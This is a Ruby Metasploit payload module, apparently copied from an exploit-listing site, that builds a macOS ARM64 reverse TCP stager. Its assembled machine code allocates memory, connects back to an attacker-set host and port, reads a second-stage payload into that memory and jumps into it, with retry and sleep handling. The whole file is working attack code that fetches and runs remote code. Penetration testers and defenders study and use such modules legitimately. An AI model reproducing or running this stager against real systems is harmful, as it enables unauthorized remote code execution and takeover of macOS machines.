## https://sploitus.com/exploit?id=MSF:PAYLOAD-OSX-AARCH64-METERPRETER-REVERSE_TCP-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
# ReverseTcp
# ----------
#
# Osx reverse TCP stager.
#
###
module MetasploitModule
  # Recorded length of the generated stager in bytes; the same value appears as
  # the #328 immediates in the machine code below.
  CachedSize = 328

  include Msf::Payload::Stager

  # Registers the module metadata (name, platform, architecture, handler).
  #
  # @param info [Hash] extra module info merged over these defaults
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Reverse TCP Stager',
        'Description' => 'Connect back to the attacker',
        'Author' => 'usiegl00',
        'License' => MSF_LICENSE,
        'Platform' => 'osx',
        'Arch' => ARCH_AARCH64,
        'Handler' => Msf::Handler::ReverseTcp,
        'Stager' => { 'RequiresMidstager' => false },
        'Convention' => 'sockedi'
      )
    )
  end

  # Builds the stager: a fixed run of aarch64 machine-code words followed by
  # data slots that are filled in from the datastore (LHOST/LPORT,
  # StagerRetryCount, StagerRetryWait). The whole array is emitted as
  # little-endian 32-bit words.
  #
  # @param _opts [Hash] unused; kept for interface compatibility
  # @return [String] the packed shellcode
  def generate(_opts = {})
    # Port and address-family are packed as two little-endian halfwords and
    # then read back as one big-endian word, so that the final 'V' pack writes
    # the bytes in memory order: 0x00, 0x02, port (network byte order).
    port_word = [datastore['LPORT'].to_i, 2].pack('vv').unpack1('N')
    # addr_aton already yields network-order bytes; unpack('V')/pack('V')
    # round-trips them unchanged.
    host_word = Rex::Socket.addr_aton(datastore['LHOST'] || '127.127.127.127').unpack1('V')

    retries = datastore['StagerRetryCount']
    wait = datastore['StagerRetryWait']
    # Split the wait into whole seconds and a nanosecond remainder.
    whole_secs = wait.to_i
    frac_nanos = (wait.modulo(1) * 1_000_000_000).to_i

    # Generated from external/source/shellcode/osx/aarch64/stager_sock_reverse.s
    # The disassembly comments are those of the original listing. The 8-byte
    # words after <sleep_seconds> are what the `ldr x16` instructions load ahead
    # of each `svc #0` — presumably the syscall numbers used by the stager.
    [
      # <_main>:
      0xaa1f03e0, # mov x0, xzr
      0xd2802901, # mov x1, #328
      0xd2800042, # mov x2, #2
      0xd2820043, # mov x3, #4098
      0xaa3f03e4, # mvn x4, xzr
      0xaa1f03e5, # mov x5, xzr
      0x580007d0, # ldr x16, 0x100003f80 <sleep_seconds+0x8>
      0xd4000001, # svc #0
      0xb100041f, # cmn x0, #1
      0x54000600, # b.eq 0x100003f54 <failed>
      0xaa0003ec, # mov x12, x0
      0xd280000a, # mov x10, #0
      0x1000064b, # adr x11, #200
      0xf940016b, # ldr x11, [x11]
      # <socket>:
      0xd2800040, # mov x0, #2
      0xd2800021, # mov x1, #1
      0xd2800002, # mov x2, #0
      0x580006b0, # ldr x16, 0x100003f88 <sleep_seconds+0x10>
      0xd4000001, # svc #0
      0xaa0003ed, # mov x13, x0
      0x10000501, # adr x1, #160
      0xf9400021, # ldr x1, [x1]
      0xf81f8fe1, # str x1, [sp, #-8]!
      0x910003e1, # mov x1, sp
      0xd2800202, # mov x2, #16
      0x580005f0, # ldr x16, 0x100003f90 <sleep_seconds+0x18>
      0xd4000001, # svc #0
      0xaa0d03e0, # mov x0, x13
      0xaa0c03e1, # mov x1, x12
      0xd2802902, # mov x2, #328
      0xd2800803, # mov x3, #64
      0xaa1f03e4, # mov x4, xzr
      0xaa1f03e5, # mov x5, xzr
      0x58000530, # ldr x16, 0x100003f98 <sleep_seconds+0x20>
      0xd4000001, # svc #0
      0xaa0c03e0, # mov x0, x12
      0xd2802901, # mov x1, #328
      0xd28000a2, # mov x2, #5
      0x580004d0, # ldr x16, 0x100003fa0 <sleep_seconds+0x28>
      0xd4000001, # svc #0
      0xd61f0180, # br x12
      # <retry>:
      0xd100056b, # sub x11, x11, #1
      0xf100017f, # cmp x11, #0
      0x540001c0, # b.eq 0x100003f54 <failed>
      0xd2800000, # mov x0, #0
      0xd2800001, # mov x1, #0
      0x10000242, # adr x2, #72
      0xf9400042, # ldr x2, [x2]
      0x10000243, # adr x3, #72
      0xf9400063, # ldr x3, [x3]
      0xa9bf0be3, # stp x3, x2, [sp, #-16]!
      0x910003e4, # mov x4, sp
      0xd2800002, # mov x2, #0
      0xd2800003, # mov x3, #0
      0x58000310, # ldr x16, 0x100003fa8 <sleep_seconds+0x30>
      0xd4000001, # svc #0
      0x54ffface, # b.al 0x100003ea8 <socket>
      # <failed>:
      0xd2800020, # mov x0, #1
      0x580002d0, # ldr x16, 0x100003fb0 <sleep_seconds+0x38>
      0xd4000001, # svc #0
      # <caddr>: sockaddr_in filled from LPORT / LHOST
      port_word, # ldr d2, 0x100025f60 <SYS_MMAP+0xfe025e9b>
      host_word, # <unknown>
      # <retry_count>:
      retries, # udf #16962
      0x00000000, # udf #16962
      # <sleep_nanoseconds>:
      0x00000000, # udf #17219
      frac_nanos, # udf #17219
      # <sleep_seconds>:
      0x00000000, # udf #17476
      whole_secs, # udf #17476
      0x020000c5, # <unknown>
      0x00000000, # udf #0
      0x02000061, # <unknown>
      0x00000000, # udf #0
      0x02000062, # <unknown>
      0x00000000, # udf #0
      0x0200001d, # <unknown>
      0x00000000, # udf #0
      0x0200004a, # <unknown>
      0x00000000, # udf #0
      0x0200005d, # <unknown>
      0x00000000, # udf #0
      0x02000001, # <unknown>
      0x00000000, # udf #0
    ].pack('V*')
  end
end